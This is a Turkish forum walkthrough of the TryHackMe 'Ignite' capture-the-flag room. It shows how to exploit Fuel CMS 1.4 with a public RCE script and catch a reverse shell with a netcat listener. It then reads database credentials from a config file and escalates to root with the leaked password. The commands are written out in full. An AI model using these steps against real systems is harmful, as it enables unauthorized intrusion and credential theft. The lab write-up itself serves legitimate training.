TryHackMe Ignite Odası Walkthrough | Detaylı Anlatım

ACE Veen

ACE Veen

Uzman üye
4 Şub 2023
1,100
554
Belirsiz

Merhaba Arkadaşlar, Bugün size TryHackMe'den "Ignite" odasının çözümünü göstereceğim. Umarım keyifli bir makale olur. İyi okumalar!

Görev 1) "Root İt"

STA8fsJ.png

User.txt

İlk olarak verilen IP adresini internet tarayıcımızda açalım ve karşımıza çıkan siteye bakalım.

puJYReM.png

Yukarıda gördüğünüz üzere sitede Fuel CMS adında bir script kullanılıyor ve bu scriptin sürümüde 1.4. İnternette “Fuel CMS Version 1.4” diye aratınca karşımıza birden çok sonuç çıkıyor fakat bizim işimiz siteyi hacklemek olduğu için “Exploit” dışındaki sonuçları umursamıyoruz.

eq5EQoI.png

İsterseniz, Exploit-DB sitesindeki exploiti kullanabilirsiniz, ancak GitHub'daki - yani ikinci sıradaki - exploit, işimize daha çok yarayacaktır. (
github.com

GitHub - ice-wzl/Fuel-1.4.1-RCE-Updated

Contribute to ice-wzl/Fuel-1.4.1-RCE-Updated development by creating an account on GitHub.
github.com github.com
)

Exploiti indirdikten sonra terminali açıp exploiti indirdiğimiz konuma gidelim. Ardından "nc -lvn <PORT>" yazıp Enter tuşuna basalım ve CTRL+T ile yeni bir terminal sekmesi açalım. Yeni terminal sekmesinde "python3 Fuel-Updated.py http://<URL> <YOUR_IP_ADDRESS> <PORT>" komutunu yazıp Enter tuşuna basalım. (nc -lvn komutunda porta 1881 girdiyseniz Fuel-Updated.py’dede 1881 girmelisiniz!)

qLDtPXi.png

NetCat bağlantımız geldikten sonra “export TERM=xterm” yazalım. “python -c 'import pty; pty.spawn("/bin/sh")'” komutu ile daha geniş yetkilere sahip bir shell elde edelim. User Flag’ını okumak için “cat /home/www-data/flag.txt” yazabiliriz.

4UMFJLr.png

Flag'i bulduktan sonra, TryHackMe platformundaki "User.txt"nin altındaki giriş alanına flag'inizi yazabilirsiniz.

Root.txt

Bu flag’i bulmak için makineyi rootlamamız gerek.

0xi4BIS.png

Zaten burada, dolaylı yoldan ne yapmanız gerektiğini söylemiş. (Anasayfada aşağı kaydırırsanız göreceksiniz.) Şimdi yapmamız gereken şey terminalde şu komutu girmek: "cd fuel/application/config && cat database.php". Komutu yazdıktan sonra karşımıza "database.php" dosyasının içeriğini gösterecektir ve dosyanın içinde kullanıcı adı (username) ve şifre (password) bilgileri bulunmaktadır.

v0zr9Hr.png

Eğer terminalde "su" komutunu yazarsak, bize bir şifre soracaktır ve şifre, gördüğünüz gibi "mememe"dır. Son olarak, "cat /root/root.txt" komutunu yazarsak, root.txt dosyasının içeriğini okuyacak ve flag'ı bize verecektir.

uIJ8LcO.png

Okuduğunuz için teşekkür ederim. Başka bir konuda veya soruda yardıma ihtiyacınız olursa her zaman buradayım. İyi çalışmalar!


yGlPP1B.png

Grey Hat Kulübü CTF Çözümleri # 1

Walkthrough by ACEVeen

 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.